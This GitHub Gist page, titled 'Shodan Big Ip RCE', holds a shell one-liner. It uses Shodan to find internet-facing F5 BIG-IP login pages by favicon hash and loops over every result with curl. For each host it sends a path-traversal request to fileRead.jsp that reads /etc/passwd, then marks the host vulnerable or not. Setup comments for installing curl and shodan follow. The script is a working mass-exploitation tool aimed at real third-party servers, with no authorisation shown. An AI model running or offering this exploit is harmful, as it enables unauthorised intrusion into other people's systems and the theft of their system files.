Last active
January 7, 2024 01:54
-
-
Save Mad-robot/e8c5a81c87d14c7fe0413be2e912141f to your computer and use it in GitHub Desktop.
Shodan Big Ip RCE
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
shodan search http.favicon.hash:-335242539 "3992" --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do curl --silent --path-as-is --insecure "https://$host/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd" | grep -q root && \printf "$host \033[0;31mVulnerable\n" || printf "$host \033[0;32mNot Vulnerable\n";done | |
#sudo apt install curl | |
#sudo apt install python3-shodan | |
#shodan init YOUR_API_KEY |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment